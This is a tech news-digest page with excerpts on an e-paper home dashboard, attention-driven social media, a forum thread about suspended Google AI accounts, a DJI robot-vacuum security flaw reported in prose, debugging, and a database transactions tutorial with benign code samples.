10 interesting stories served every morning and every evening.




1 1,048 shares, 77 trendiness

How I built Timeframe, our family e-paper dashboard

TL;DR: Over the past decade, I’ve worked to build the per­fect fam­ily dash­board sys­tem for our home, called Timeframe. Combining cal­en­dar, weather, and smart home data, it’s be­come an im­por­tant part of our daily lives.

When Caitlin and I got mar­ried a decade ago, we set an in­ten­tion to have a healthy re­la­tion­ship with tech­nol­ogy in our home. We kept our bed­room free of any screens, charg­ing our de­vices else­where overnight. But we missed our cal­en­dar and weather apps.

So I set out to build a so­lu­tion to our prob­lem. First, I con­structed a Magic Mirror us­ing an off-the-shelf med­i­cine cab­i­net and LCD dis­play with its frame re­moved. It showed the cal­en­dar and weather data we needed:

But it was hard to read the text, especially during the day, as we get significant natural light in Colorado. At night, it glowed like any backlit display, sticking out like a sore thumb in our living space.

I then spent about a year experimenting with various jailbroken Kindle devices, eventually landing on a design with calendar and weather data on a pair of screens. The Kindles took a few seconds to refresh and flash the screen to reset the ink pixels, so they only updated every half hour. I designed wood enclosures and laser-cut them at the local library makerspace:

Software-wise, I built a Ruby on Rails app for fetch­ing the nec­es­sary data from Google Calendar and Dark Sky. The Kindles woke up on a sched­ule, load­ing a URL in the app that ren­dered a PNG us­ing IMGKit. The pro­to­type proved e-pa­per was the right so­lu­tion: it was un­ob­tru­sive re­gard­less of light­ing:

The Kindles were a hack, re­quir­ing con­stant tin­ker­ing to keep them work­ing. It was time for a more re­li­able so­lu­tion. I tried an OLED screen to see if the lack of a global back­light would be less dis­tract­ing, but it was­n’t much bet­ter than the Magic Mirror:

So it was back to e-pa­per. I found a sys­tem of dis­plays from Visionect, which came in 6”/10”/13”/32” sizes and could up­date every ten min­utes for 2-3 months on a sin­gle charge:

The 32” screen used an out­dated lower-con­trast panel and its res­o­lu­tion was too low to ren­der text smoothly. The smaller sizes used a con­trasty, high-PPI panel. I ended up us­ing a com­bi­na­tion of them around the house: a 6” in the mud­room for the weather, a 13” (with its built-in mag­netic back­ing) in the kitchen at­tached to the side of the fridge, and a 10” in the bed­room.

The Visionect dis­plays re­quired run­ning cus­tom closed-source soft­ware, ei­ther as a SaaS or lo­cally with Docker. I opted for a lo­cal in­stal­la­tion on the Raspberry Pi al­ready run­ning the Rails back­end. I had my best re­sults push­ing im­ages to the Visionect dis­plays every five min­utes in a re­cur­ring back­ground job. It used IMGKit to gen­er­ate a PNG and send it to the Visionect API, logic I ex­tracted into vi­sionect-ruby. This setup proved to be in­cred­i­bly re­li­able, with­out a sin­gle fail­ure for months at a time.

Visiting friends of­ten asked how they could have a sim­i­lar sys­tem in their home. Three years af­ter the ini­tial pro­to­type, I did my first mar­ket test with a po­ten­tial cus­tomer. At their re­quest, I ex­per­i­mented with dif­fer­ent for­mats, in­clud­ing a month view on the 13” screen:

Unfortunately, the cus­tomer did­n’t see enough value to jus­tify the $1000 price tag (in 2019!) for the 13” de­vice, let alone any­thing I’d charge for a sub­scrip­tion ser­vice. At around the same time, Visionect started charg­ing a $7/mo per-de­vice fee to run their back­end soft­ware on premises with Docker, af­ter years of it be­ing free to use. I’d have needed to charge $10/month, if not more, for a sin­gle screen!

In late 2021, the Marshall Fire de­stroyed our home along with ~1,000 oth­ers. Our home­own­er’s in­sur­ance gave us two years to re­build, so we set off to re­design our home from the ground up.

Around the same time, Boox re­leased the 25.3” Mira Pro, the first high-res­o­lu­tion op­tion for large e-pa­per screens. Best of all, it could up­date in re­al­time! Unlike the Visionect de­vices, it was just a dis­play with an HDMI port and needed to be plugged into power. A quick pro­to­type pow­ered by an old Mac Mini made it im­me­di­ately ob­vi­ous that it was a huge step for­ward in ca­pa­bil­ity. The larger screen al­lowed for sig­nif­i­cantly more in­for­ma­tion to be dis­played:

But the most com­pelling in­no­va­tion was hav­ing the screen up­date in re­al­time. I added a clock, the cur­rent song play­ing on our Sonos sys­tem (using jishi/​node-sonos-http-api) and the next-hour pre­cip­i­ta­tion fore­cast from Dark Sky:

The working prototype was enough to convince me to build a place for it in the new house. We designed a "phone nook" on our main floor with an art light for the display:

We also ran power to two more lo­ca­tions for 13” Visionect dis­plays, one in our bed­room and one by the door to our garage:

The real-time re­quire­ments of the Mira Pro im­me­di­ately sur­faced per­for­mance and com­plex­ity is­sues in the back­end, prompt­ing an al­most com­plete rewrite.

While the Visionect system worked just fine with multiple-second response times, switching to long-polling every two seconds effectively capped how slow responses could afford to be. To start, I moved away from generating images in the app. The Visionect folks added the ability to render a URL directly in the backend, freeing up resources to serve the long-polling requests.

Most sig­nif­i­cantly, I started mi­grat­ing to­wards Home Assistant (HA) as the pri­mary data source. HA al­ready had in­te­gra­tions for Google Calendar, Dark Sky (now Apple Weather), and Sonos, en­abling me to re­move over half of the code in the Timeframe code­base! I ended up land­ing a PR to Home Assistant to al­low for the cal­en­dar be­hav­ior I needed, and will prob­a­bly need to write a cou­ple more be­fore HA can be the sole data source.

With less data-fetch­ing logic, I was able to re­move both the data­base and Redis from the Rails ap­pli­ca­tion, a mas­sive re­duc­tion in com­plex­ity. I now run the back­ground tasks with Rufus Scheduler and save data fetch­ing re­sults with the Rails file store cache back­end.

In addition to data retrieval, I've also worked to move as much of the application logic as possible into Home Assistant. I now automatically display the status of any sensor whose name begins with sensor.timeframe, using a simple ICON,Label CSV format.
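On the display side, that convention takes only a few lines to interpret. Here is a hypothetical helper (illustrative only, not Timeframe's actual code) that splits a sensor state into an icon name and a label:

```python
def parse_status(sensor_state: str):
    """Split a sensor value like 'utensils,Run the dishwasher!' into
    an (icon, label) pair. Hypothetical sketch of the ICON,Label
    convention described above, not Timeframe's real implementation."""
    # partition() splits on the first comma only, so commas inside the
    # label text are preserved.
    icon, _, label = sensor_state.partition(",")
    return icon.strip(), label.strip()

print(parse_status("utensils,Run the dishwasher!"))
# ('utensils', 'Run the dishwasher!')
```

Using partition rather than split means a label such as "Front door, unlocked" survives intact.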

For ex­am­ple, the other day I wanted to have a re­minder to start or sched­ule our dish­washer af­ter 8pm if it was­n’t set to run. It took me about a minute to write a tem­plate sen­sor us­ing the power level from the out­let:

{% if states('sensor.kitchen_dishwasher_switched_outlet_power')|float < 2 and now().hour > 19 %}
utensils,Run the dishwasher!
{% endif %}

In the month since adding the helper, it re­minded me twice when I’d have oth­er­wise for­got­ten. And I did­n’t have to com­mit or de­ploy any code!

Since mov­ing into our new home, we’ve come to rely on the real-time func­tion­al­ity much more sig­nif­i­cantly. Effectively, we’ve turned the top-left cor­ner of the dis­plays into a sta­tus in­di­ca­tor for the house. For ex­am­ple, it shows what doors are open/​un­locked:

Or whether the laun­dry is done:

It has a powerful function: if the status on the display is blank, the house is in a "healthy" state and does not need any attention. This approach of only showing what information is relevant in a given moment flies in the face of how most smart homes approach communicating their status:

The sin­gle sta­tus in­di­ca­tor re­moves the need to scan an en­tire screen. This change in ap­proach is pos­si­ble be­cause of one key dif­fer­ence: we have sep­a­rated the con­trol of our de­vices from the dis­play of their sta­tus.

I con­tinue to re­ceive sig­nif­i­cant in­ter­est in the pro­ject and re­main fo­cused on bring­ing it to mar­ket. A few key is­sues re­main:

While I have made sig­nif­i­cant progress in han­dling run­time er­rors grace­fully, I have plenty to learn about cre­at­ing em­bed­ded sys­tems that do not need main­te­nance.

There are still sev­eral data sources I fetch di­rectly out­side of Home Assistant. Once HA is the sole source of data, I’ll be able to have Timeframe be a Home Assistant App, mak­ing it sig­nif­i­cantly eas­ier to dis­trib­ute.

The cur­rent hard­ware setup is not ready for adop­tion by the av­er­age con­sumer. The 25” Boox dis­play is ex­cel­lent but costs about $2000! It also does­n’t in­clude the hard­ware needed to drive the dis­play. There are a cou­ple of po­ten­tial op­tions to con­sider, such as Android-powered de­vices from Boox and Philips or low-cost op­tions from TRMNL.

Building Timeframe con­tin­ues to be a pas­sion of mine. While my day job has me build­ing soft­ware for over a hun­dred mil­lion peo­ple, it’s re­fresh­ing to work on a pro­ject that im­proves my fam­i­ly’s daily life.

...

Read the original on hawksley.org »

2 601 shares, 29 trendiness

Attention Media ≠ Social Networks

When web-based so­cial net­works started flour­ish­ing nearly two decades ago, they were gen­uinely so­cial net­works. You would sign up for a pop­u­lar ser­vice, fol­low peo­ple you knew or liked and read up­dates from them. When you posted some­thing, your fol­low­ers would re­ceive your up­dates as well. Notifications were gen­uine. The lit­tle icons in the top bar would light up be­cause some­one had sent you a di­rect mes­sage or en­gaged with some­thing you had posted. There was also, at the be­gin­ning of this mil­len­nium, a gen­eral sense of hope and op­ti­mism around tech­nol­ogy, com­put­ers and the Internet. Social net­work­ing plat­forms were one of the ser­vices that were part of what was called Web 2.0, a term used for web­sites built around user par­tic­i­pa­tion and in­ter­ac­tion. It felt as though the in­for­ma­tion su­per­high­way was fi­nally reach­ing its po­ten­tial. But some­time be­tween 2012 and 2016, things took a turn for the worse.

First came the in­fa­mous in­fi­nite scroll. I re­mem­ber feel­ing un­easy the first time a web page no longer had a bot­tom. Logically, I knew very well that every­thing a browser dis­plays is a vir­tual con­struct. There is no phys­i­cal page. It is just pix­els pre­tend­ing to be one. Still, my brain had learned to treat web pages as ob­jects with a be­gin­ning and an end. The sud­den dis­ap­pear­ance of that end dis­turbed my sense of ease.

Then came the bo­gus no­ti­fi­ca­tions. What had once been mean­ing­ful sig­nals turned into ar­bi­trary prompts. Someone you fol­lowed had posted some­thing un­re­mark­able and the plat­form would sur­face it as a no­ti­fi­ca­tion any­way. It did­n’t mat­ter whether the no­ti­fi­ca­tion was rel­e­vant to me. The no­ti­fi­ca­tion sys­tem stopped serv­ing me and started serv­ing it­self. It felt like a vi­o­la­tion of an un­spo­ken agree­ment be­tween users and ser­vices. Despite all that, these plat­forms still re­mained so­cial in some di­luted sense. Yes, the no­ti­fi­ca­tions were ma­nip­u­la­tive, but they were at least about peo­ple I ac­tu­ally knew or had cho­sen to fol­low. That, too, would change.

Over time, my time­line con­tained fewer and fewer posts from friends and more and more con­tent from ran­dom strangers. Using these ser­vices be­gan to feel like stand­ing in front of a blar­ing loud­speaker, broad­cast­ing frag­ments of con­ver­sa­tions from all over the world di­rectly in my face. That was when I gave up on these ser­vices. There was noth­ing so­cial about them any­more. They had be­come at­ten­tion me­dia. My at­ten­tion is pre­cious to me. I can­not spend it mind­lessly scrolling through videos that have nei­ther rel­e­vance nor sub­stance.

But where one av­enue dis­ap­peared, an­other emerged. A few years ago, I stum­bled upon Mastodon and it re­minded me of the early days of Twitter. Back in 2006, I fol­lowed a small num­ber of folks of the nerd va­ri­ety on Twitter and re­ceived gen­uinely in­ter­est­ing up­dates from them. But when I log into the ru­ins of those older plat­forms now, all I see are ran­dom videos pre­sented to me for rea­sons I can nei­ther in­fer nor care about. Mastodon, by con­trast, still feels like so­cial net­work­ing in the orig­i­nal sense. I fol­low a small num­ber of peo­ple I gen­uinely find in­ter­est­ing and I re­ceive their up­dates and only their up­dates. What I see is the re­sult of my own choices rather than a sys­tem try­ing to cap­ture and mon­e­tise my at­ten­tion. There are no bo­gus no­ti­fi­ca­tions. The time­line feels calm and pre­dictable. If there are no new up­dates from peo­ple I fol­low, there is noth­ing to see. It feels closer to how so­cial net­works used to work orig­i­nally. I hope it stays that way.

...

Read the original on susam.net »

3 583 shares, 62 trendiness

Account Restricted Without WARNING – Google AI Ultra / OAuth via OpenClaw

I’m seek­ing as­sis­tance re­gard­ing a sud­den re­stric­tion on my Google AI Ultra ac­count that has per­sisted for three days. I re­ceived no prior warn­ings or no­ti­fi­ca­tions re­gard­ing a po­ten­tial vi­o­la­tion.

The only re­cent change in my work­flow was con­nect­ing Gemini mod­els via OpenClaw OAuth. If third-party in­te­gra­tions are the is­sue, I would ex­pect the plat­form to block the in­te­gra­tion rather than re­strict a paid ac­count ($249/mo) with­out com­mu­ni­ca­tion.

I have al­ready emailed sup­port but haven’t re­ceived a re­sponse. Additionally, I found that ac­cess­ing GCC sup­port re­quires an ad­di­tional fee, which seems un­rea­son­able given the ex­ist­ing sub­scrip­tion cost. I WOULD LOVE TO GET THIS RESOLVED!!

Thank you for bring­ing this to our at­ten­tion. We have shared the is­sue to our in­ter­nal teams for a thor­ough in­ves­ti­ga­tion.

To en­sure our en­gi­neer­ing team can in­ves­ti­gate and re­solve these is­sues ef­fec­tively, we highly rec­om­mend fil­ing bug re­ports di­rectly through the Antigravity in-app feed­back tool. You can do this by nav­i­gat­ing to the top-right cor­ner of the in­ter­face, click­ing the Feedback icon, and se­lect­ing Report Issue.

Sir, I am logged out of my ac­count and I can’t even get into the app!! This is so frus­trat­ing..

[UPDATE] Day 4, and still to­tal si­lence from sup­port. I’ve re­ceived zero ac­knowl­edge­ment through of­fi­cial chan­nels or the feed­back cen­ter. I am now in the process of mov­ing all my data and sub­scrip­tions off Google. It’s stag­ger­ing that an or­ga­ni­za­tion of this scale can be this un­re­spon­sive to a wide­spread is­sue.

I contacted Google Cloud Support via a "GCP Account Suspension Inquiry". They told me to contact Google One Support, because "the error is tied to the personal subscription, not to a Google Cloud project billing account". Google One support told me to contact Google Cloud support

From the "gemini-code-assist-user-feedback" and "antigravity-support" emails, still no answer.

And it hap­pens af­ter some days af­ter I bought the sub­scrip­tion for an year…

any up­date? please tell us how did u solved it!

Nope, still re­stricted, tried to es­ca­late by Google One, But they can’t help with the prob­lem ei­ther…

Same is­sue and same sen­ti­ment and I can­celled and re­moved billing for all Google prod­ucts. Absolutely shame­ful treat­ment of pay­ing cus­tomers. I emailed each of the con­tact emails for Antigravity and gem­ini-code-as­sist with­out re­ply. Unfortunately I pre­paid for a year so it looks like I’ll have to sue a tril­lion-dol­lar com­pany just to get the measly fee?

I have tried to contact everyone I could. And you all know how disgusting their support is. I am totally disappointed with their customer service. After 3 weeks waiting, the result is that they cannot restore my account. I guess it is time to move on to Codex or Claude Code. Below is their reply after "full investigation by the internal team":

"Thank you for your continued patience as we have thoroughly investigated your account access issue. Please be assured that we conducted a comprehensive investigation, exploring every possible avenue to restore your access.

Our prod­uct en­gi­neer­ing team has con­firmed that your ac­count was sus­pended from us­ing our Antigravity ser­vice. This sus­pen­sion af­fects your ac­cess to the Gemini CLI and any other ser­vice that uses the Cloud Code Private API.

Our investigation specifically confirmed that the use of your credentials within the third-party tool "open claw" for testing purposes constitutes a violation of the Google Terms of Service [1]. This is due to the use of Antigravity servers to power a non-Antigravity product.

I must be trans­par­ent and in­form you that, in ac­cor­dance with Google’s pol­icy, this sit­u­a­tion falls un­der a zero tol­er­ance pol­icy, and we are un­able to re­verse the sus­pen­sion. I am truly sorry to share this dif­fi­cult news with you.”

Ok so ba­si­caly, there’s no way we can re­store our ac­counts to use Antigravity any­more yeah? this is un­ex­pected, but un­til we can fig­ure out how to re­solve this is­sue, I’ll just sub­scribed us­ing dif­fer­ent ac­count

I’m in the same sit­u­a­tion…

Hi @Abhijit_Pramanik , could you please pro­vide some help? This si­lence is un­bear­able.

Gemini Disabled on Antigravity IDE, How to Restore Access?

I’m in con­tact with Google One but their ac­tions are no help at all, for al­most a week they haven’t done any­thing, they only asked for screen­shots/​record­ings of the lo­gin at­tempt.

Why is there si­lence from Google? What is the user sup­posed to do? Create a new ac­count and buy a new PRO/ULTRA, or what? Any in­for­ma­tion at all?!

I’ve got ban and the only dif­fer­ence from vanilla IDE ex­pe­ri­ence was anti­grav­ity-cock­pit ex­ten­sion. No re­ply to my ap­peal email last 12 hours.


I’m sub­scrib­ing the AI Pro and just in­te­grated Gemini to OpenCode yes­ter­day. After a just day use, my ac­count is sus­pended with­out any warn­ings. Simply the API re­turns 403 er­ror to my OpenCode and Gemini CLI like this:

Failed to lo­gin. Message: This ser­vice has been dis­abled in this ac­count for vi­o­la­tion of Terms of Service. If you be­lieve this is an er­ror, con­tact gem­ini-code-as­sist-user-feed­back@google.com.

I emailed to the con­tact this morn­ing but did­n’t get any re­sponse yet.

If this is in­deed the case, I find it ut­terly ab­surd. It seems Google’s re­sponse is woe­fully in­ad­e­quate; I should ex­plore Claude or other al­ter­na­tives.

Quick update for everyone stuck in this 403 loop: I just spent the last 8 days fighting through Tier 1 support. Google One support finally admitted on record it's a "known WAF bug", but then literally routed me to Android App Developer support because they have no backend access to fix it.

The en­tire sup­port flow­chart is com­pletely bro­ken, and they are still billing us $250/mo for bricked ac­counts. I just doc­u­mented the en­tire Kafkaesque sup­port loop over on the google_anti­grav­ity sub­red­dit. If you are stuck in this same Catch-22, go search for that post over there and share your Trajectory IDs in the com­ments so we can get some ac­tual en­gi­neer­ing eyes on this mass ban wave.

Hi @K8L, just wanted to share some con­text re­gard­ing this sit­u­a­tion as I see you are wait­ing for a re­sponse.

Yesterday, Abhijit actually posted a brief statement acknowledging these 403 ToS issues, noting that the internal team was "prioritizing a resolution." However, the message was deleted just a few minutes later.

Hoping for some trans­parency, I left a sin­gle, po­lite com­ment ask­ing for clar­i­fi­ca­tion on why the up­date was re­moved. Surprisingly, my fo­rum ac­count was banned shortly af­ter post­ing that ques­tion.

Currently, there seems to be no of­fi­cial com­mu­ni­ca­tion re­gard­ing these 403 er­rors, al­though we can see ac­tive replies be­ing made to other un­re­lated threads on the fo­rum.

This sit­u­a­tion is quite con­cern­ing for us as de­vel­op­ers. The au­to­mated sys­tem is still trig­ger­ing these mass bans daily dur­ing fixed time win­dows, with­out any warn­ing and seem­ingly with­out a re­view of the cur­rent process.

Fingers crossed this mes­sage does­n’t get taken down and my ac­count sur­vives long enough for you guys to read it, haha.

Facing this issue too. I wrote an email to gemini-code-assist-user-feedback@google.com eight days ago, and still got no response today. So disappointed

My ac­count (pro) was also bricked for call­ing Gemini model from pi har­ness two times. No re­sponse from sup­port and it’s been four days.

...

Read the original on discuss.ai.google.dev »

4 402 shares, 32 trendiness

Short videos. Your community. Your rules.

All the fun of short-form video, none of the cor­po­rate con­trol.

Loops is fed­er­ated, open-source, and de­signed to give power back to cre­ators and com­mu­ni­ties across the so­cial web. Build your com­mu­nity on a plat­form that can’t lock you in.

...

Read the original on joinloops.org »

5 283 shares, 15 trendiness

Man accidentally gains control of 7,000 robot vacuums

A software engineer's earnest effort to steer his new DJI robot vacuum with a video game controller inadvertently granted him a sneak peek into thousands of people's homes.

While building his own remote-control app, Sammy Azdoufal reportedly used an AI coding assistant to help reverse-engineer how the robot communicated with DJI's remote cloud servers. But he soon discovered that the same credentials that allowed him to see and control his own device also provided access to live camera feeds, microphone audio, maps, and status data from nearly 7,000 other vacuums across 24 countries. The backend security bug effectively exposed an army of internet-connected robots that, in the wrong hands, could have turned into surveillance tools, all without their owners ever knowing.

Luckily, Azdoufal chose not to exploit that. Instead, he shared his findings with The Verge, which quickly contacted DJI to report the flaw. While DJI tells Popular Science the issue has been "resolved," the dramatic episode underscores warnings from cybersecurity experts, who have long warned that internet-connected robots and other smart home devices present attractive targets for hackers.

As more house­holds adopt home ro­bots, (including newer, more in­ter­ac­tive hu­manoid mod­els) sim­i­lar vul­ner­a­bil­i­ties could be­come harder to de­tect. AI-powered cod­ing tools, which make it eas­ier for peo­ple with less tech­ni­cal knowl­edge to ex­ploit soft­ware flaws, po­ten­tially risk am­pli­fy­ing those wor­ries even fur­ther.

The ro­bot in ques­tion is the DJI Romo, an au­tonomous home vac­uum that first launched in China last year and is cur­rently ex­pand­ing to other coun­tries. It re­tails for around $2,000 and is roughly the size of a large ter­rier or a small fridge when docked at its base sta­tion. Like other ro­bot vac­u­ums, it’s equipped with a range of sen­sors that help it nav­i­gate its sur­round­ings and de­tect ob­sta­cles. Users can sched­ule and con­trol it via an app, but it is de­signed to spend most of its time clean­ing and mop­ping au­tonomously.

In order for the Romo, or really any modern autonomous vacuum, to function, it needs to constantly collect visual data from the building it is operating in. It also needs to understand specific details about what makes, say, a kitchen different from a bedroom, so it can distinguish between the two. Some of that sensor data is stored remotely on DJI's servers rather than on the device itself. For Azdoufal's DIY controller idea to work, he would need a way for his app to communicate with DJI's servers and extract a security token that proves he is the owner of the robot.

Rather than just verifying a single token, the servers granted access to a small army of robots, essentially treating him as their respective owner. That slip-up meant Azdoufal could tap into their real-time camera feeds and activate their microphones. He also claims he could compile 2D floor plans of the homes the robots were operating in. A quick look at the robots' IP addresses also revealed their approximate locations. None of this, Azdoufal insists, amounts to "hacking" on his part. He simply stumbled upon a major security issue.

"DJI identified a vulnerability affecting DJI Home through internal review in late January and initiated remediation immediately," DJI told Popular Science. "The issue was addressed through two updates, with an initial patch deployed on February 8 and a follow-up update completed on February 10. The fix was deployed automatically, and no user action is required."

The company went on to say it plans to "continue to implement additional security enhancements" but did not specify what those may entail.

The DJI security concerns come amid a period of growing unease generally about the surveillance capabilities of smart home technology. Earlier this month, Ring camera owners flooded social media after a controversial advertisement for the company's pet-finding "search party" feature was interpreted by some as a Trojan horse for broader monitoring. Around the same time, reports that Google was able to retrieve video footage from a Nest Doorbell camera to assist in an abduction investigation (despite earlier indications that the footage had been deleted) reignited debate over how much control consumers truly have over their sensitive data.

On top of that, lawmakers from both political parties in the US have spent years warning that DJI and other Chinese tech manufacturers pose a unique security threat. The evidence for those claims is murky, but it has nonetheless helped justify the banning of certain Chinese-made products.

The irony of many robot vacuums and other smart home devices is that, as a category, they have a long history of questionable security practices, despite the fact that they operate in some of our most private spaces. All signs suggest that the average person will soon welcome more cameras and microphones into their homes, not fewer. As of 2020, market research firm Parks Associates estimated that 54 million U.S. households had at least one smart home device installed. Other surveys show that those who already have one often want more.

The spe­cific types of de­vices en­ter­ing homes are also be­com­ing more so­phis­ti­cated. Though still early, Tesla, Figure, and other com­pa­nies are rac­ing to build hu­man-like au­tonomous ro­bots that can live in a home and per­form chores. A com­pany called 1X is al­ready re­tail­ing one of these hu­manoids, claim­ing it can clean dishes and crack wal­nuts—al­beit of­ten with some help from a hu­man. Eventually though, for any of these at-home ro­bot ser­vants to func­tion ef­fec­tively, they will need un­prece­dented ac­cess to the in­ti­mate de­tails of their own­ers’ homes. For a stalker or hacker, that rep­re­sents a po­ten­tial gold­mine.

True to his word though, Azdoufal found him­self wrapped up in this mess even though all he wanted to do was drive his ro­bot around with a joy­stick. On that front, mis­sion ac­com­plished.

...

Read the original on www.popsci.com »

6 282 shares, 13 trendiness

Iran students resume anti-government protests

"I don't want to use the word 'frustrated,' because he understands he has plenty of alternatives, but he's curious as to why they haven't… I don't want to use the word 'capitulated,' but why they haven't capitulated," he said.

...

Read the original on www.bbc.com »

7 238 shares, 13 trendiness

Fix your tools

Last week I had to di­ag­nose a bug in an open source li­brary I main­tain. The is­sue was gnarly enough that I could­n’t find it right away, but then I thought: if I set a break­point here and fire up the de­bug­ger, I will likely find the root cause very soon… and then pro­ceed to mer­ci­lessly de­stroy it!

So I rolled up my sleeves, set the break­point, fired up the de­bug­ger, and… saw the pro­gram run to com­ple­tion with­out in­ter­rup­tions what­so­ever. My break­point had been ig­nored, even though I knew for cer­tain that the line of code in ques­tion must have been ex­e­cuted (I dou­ble-checked just to be sure).

Since I was in "problem solving mode", I ignored the debugger issue and started thinking of other approaches to diagnosing the bug. Falling prey to tunnel vision, I modified the code to log potentially interesting data, but it didn't yield the insights I was hoping for. How frustrating!

My fin­ger­tips itched to write even more trou­bleshoot­ing code when it sud­denly dawned on me: just fix the darn de­bug­ger al­ready! Sure, it might feel slower, but it will give you the abil­ity to see what you need to see, and then ac­tu­ally solve the prob­lem.

So I fixed the de­bug­ger (it turned out to be a one-line con­fig­u­ra­tion change), ob­served the pro­gram’s be­hav­ior in more de­tail, and used that knowl­edge to solve the is­sue.

What a para­dox, I re­al­ized af­ter­wards. The very de­sire to fix the bug pre­vented me from see­ing I had to fix the tool first, and made me less ef­fec­tive in my bug hunt. This blog post is a re­minder to my­self, and to every bug-hun­gry pro­gram­mer out there: fix your tools! They will do won­ders for you.

...

Read the original on ochagavia.nl »

8 230 shares, 11 trendiness

Database Transactions — PlanetScale


Transactions are fun­da­men­tal to how SQL data­bases work. Trillions of trans­ac­tions ex­e­cute every sin­gle day, across the thou­sands of ap­pli­ca­tions that rely on SQL data­bases.

A trans­ac­tion is a se­quence of ac­tions that we want to per­form on a data­base as a sin­gle, atomic op­er­a­tion. An in­di­vid­ual trans­ac­tion can in­clude a com­bi­na­tion of read­ing, cre­at­ing, up­dat­ing, and re­mov­ing data.

In MySQL and Postgres, we be­gin a new trans­ac­tion with be­gin; and end it with com­mit;. Between these two com­mands, any num­ber of SQL queries that search and ma­nip­u­late data can be ex­e­cuted.

The example above shows a transaction begin, three query executions, then the commit. The act of committing is what atomically applies all of the changes made by those SQL statements.
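As a runnable illustration of the begin-queries-commit shape (using Python's built-in sqlite3 module as a stand-in for MySQL or Postgres; the table and values are made up for the example):

```python
import sqlite3

# isolation_level=None puts the connection in autocommit mode,
# so we issue BEGIN and COMMIT explicitly, as in the article.
conn = sqlite3.connect(":memory:", isolation_level=None)
conn.execute("CREATE TABLE accounts (id INTEGER PRIMARY KEY, balance INTEGER)")
conn.execute("INSERT INTO accounts VALUES (1, 100), (2, 50)")

conn.execute("BEGIN")
conn.execute("UPDATE accounts SET balance = balance - 25 WHERE id = 1")
conn.execute("UPDATE accounts SET balance = balance + 25 WHERE id = 2")
conn.execute("COMMIT")  # both updates become visible atomically

print(conn.execute("SELECT balance FROM accounts ORDER BY id").fetchall())
# [(75,), (75,)]
```

Either both balance changes land or neither does; no reader can ever observe the money "in flight" between the two updates.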

There are some sit­u­a­tions where trans­ac­tions do not com­mit. This is some­times due to un­ex­pected events in the phys­i­cal world, like a hard drive fail­ure or power out­age. Databases like MySQL and Postgres are de­signed to cor­rectly han­dle many of these un­ex­pected sce­nar­ios, us­ing dis­as­ter re­cov­ery tech­niques. Postgres, for ex­am­ple, han­dles this via its write-ahead log mech­a­nism (WAL).

There are also times when we want to in­ten­tion­ally undo a par­tially-ex­e­cuted trans­ac­tion. This hap­pens when mid­way through a trans­ac­tion, we en­counter miss­ing / un­ex­pected data or get a can­cel­la­tion re­quest from a client. For this, data­bases sup­port the roll­back; com­mand.

In the ex­am­ple above, the trans­ac­tion made sev­eral mod­i­fi­ca­tions to the data­base, but those changes were iso­lated from all other on­go­ing queries and trans­ac­tions. Before the trans­ac­tion com­mit­ted, we de­cided to roll­back, un­do­ing all changes and leav­ing the data­base un­al­tered by this trans­ac­tion.
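A rollback can be sketched the same way (again with sqlite3 standing in for MySQL/Postgres, and an invented table):

```python
import sqlite3

conn = sqlite3.connect(":memory:", isolation_level=None)  # autocommit; manual BEGIN
conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)")
conn.execute("INSERT INTO users VALUES (1, 'ben')")

conn.execute("BEGIN")
conn.execute("UPDATE users SET name = 'joe' WHERE id = 1")
conn.execute("DELETE FROM users WHERE id = 1")
conn.execute("ROLLBACK")  # undo every change made since BEGIN

print(conn.execute("SELECT name FROM users").fetchall())
# [('ben',)]
```

After the rollback, the row is back exactly as it was: neither the rename nor the delete ever happened as far as the database is concerned.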

By the way, you can use the menu be­low to change the speed of all the ses­sions and an­i­ma­tions in this ar­ti­cle. If the ones above were go­ing too fast or too slow for your lik­ing, fix that here!

A key rea­son trans­ac­tions are use­ful is to al­low ex­e­cu­tion of many queries si­mul­ta­ne­ously with­out them in­ter­fer­ing with each other. Below you can see a sce­nario with two dis­tinct ses­sions con­nected to the same data­base. Session A starts a trans­ac­tion, se­lects data, up­dates it, se­lects again, and then com­mits. Session B se­lects that same data twice dur­ing a trans­ac­tion and again af­ter both of the trans­ac­tions have com­pleted.

Session B does not see the name up­date from ben to joe un­til af­ter Session A com­mits the trans­ac­tion.
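You can reproduce the shape of this two-session scenario with SQLite in WAL mode as a stand-in for a real server database (SQLite's isolation rules differ from REPEATABLE READ in detail, but the visibility of committed vs. uncommitted data is the same):

```python
import os
import sqlite3
import tempfile

path = os.path.join(tempfile.mkdtemp(), "demo.db")
a = sqlite3.connect(path)
b = sqlite3.connect(path)
a.execute("PRAGMA journal_mode=WAL")  # lets B read while A holds a write transaction
a.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)")
a.execute("INSERT INTO users VALUES (1, 'ben')")
a.commit()

a.execute("UPDATE users SET name = 'joe' WHERE id = 1")  # Session A: uncommitted
before = b.execute("SELECT name FROM users WHERE id = 1").fetchone()

a.commit()
after = b.execute("SELECT name FROM users WHERE id = 1").fetchone()
print(before, after)  # ('ben',) ('joe',)
```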

Consider the same sequence of events, except instead of committing the transaction in Session A, we roll back.

The sec­ond ses­sion never sees the ef­fect of any changes made by the first, due to the roll­back. This is a nice segue into an­other im­por­tant con­cept in trans­ac­tions: Consistent reads.

During a trans­ac­tion’s ex­e­cu­tion, we would like it to have a con­sis­tent view of the data­base. This means that even if an­other trans­ac­tion si­mul­ta­ne­ously adds, re­moves, or up­dates in­for­ma­tion, our trans­ac­tion should get its own iso­lated view of the data, un­af­fected by these ex­ter­nal changes, un­til the trans­ac­tion com­mits.

MySQL and Postgres both sup­port this ca­pa­bil­ity when op­er­at­ing in REPEATABLE READ mode (plus all stricter modes, too). However, they each take dif­fer­ent ap­proaches to achiev­ing this same goal.

Postgres han­dles this with multi-ver­sion­ing of rows. Every time a row is in­serted or up­dated, it cre­ates a new row along with meta­data to keep track of which trans­ac­tions can ac­cess the new ver­sion. MySQL han­dles this with an undo log. Changes to rows im­me­di­ately over­write old ver­sions, but a record of mod­i­fi­ca­tions is main­tained in a log file, in case they need to be re­con­structed.

Let’s take a close look at each.

Below, you’ll see a simple user table on the left and a sequence of statements in Session A on the right. Click the “play sessions” button and watch what happens as the statements get executed.

* An update is made to the user with ID 4, changing the name from “liz” to “aly”. This causes a new version of the row to be created, while the old one is kept.

* The old version of the row had its xmax set to 10 (xmax = max transaction ID)

* The new version of the row also had its xmin set to 10 (xmin = min transaction ID)

* The transaction commits, making the update visible to the broader database

But now we have two versions of the row with ID = 4. Ummm… that’s odd! The key here is xmin and xmax.

